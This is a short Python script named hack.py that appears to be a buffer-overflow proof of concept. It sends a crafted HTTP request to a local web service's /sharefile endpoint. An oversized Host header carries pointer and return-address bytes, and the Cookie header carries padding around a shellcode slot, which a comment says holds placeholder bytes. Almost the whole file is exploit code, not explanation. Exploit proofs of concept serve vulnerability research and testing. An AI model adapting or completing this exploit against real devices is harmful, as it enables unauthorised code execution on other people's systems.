hack.py 935 B

1234567891011121314151617181920212223242526
  1. import socket
  2. p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  3. p.connect(("127.0.0.1" , 18080))
  4. shellcode = "A"*0x200 # *** Not the correct shellcode for exploit ***
  5. rn = "\r\n"
  6. strptr = "\x60\x70\xff\x7f"
  7. padding = "\x00\x00\x00\x00"
  8. payload = "GET /sharefile?test=A" + "HTTP/1.1" + rn
  9. payload += "Host: " + "A"*0x70 + strptr*2 + "A"*0x24 + "\xb8\xfe\x48" + rn
  10. payload += "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0" + rn
  11. payload += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn
  12. payload += "Accept-Language: en-US,en;q=0.5" + rn
  13. payload += "Accept-Encoding: gzip, deflate" + rn
  14. payload += "Cookie: curShow=; ac_login_info=passwork; test=A" + padding*0x200 + shellcode + padding*0x4000 + rn
  15. payload += "Connection: close" + rn
  16. payload += "Upgrade-Insecure-Requests: 1" + rn
  17. payload += rn
  18. p.send(payload)
  19. print(p.recv(4096))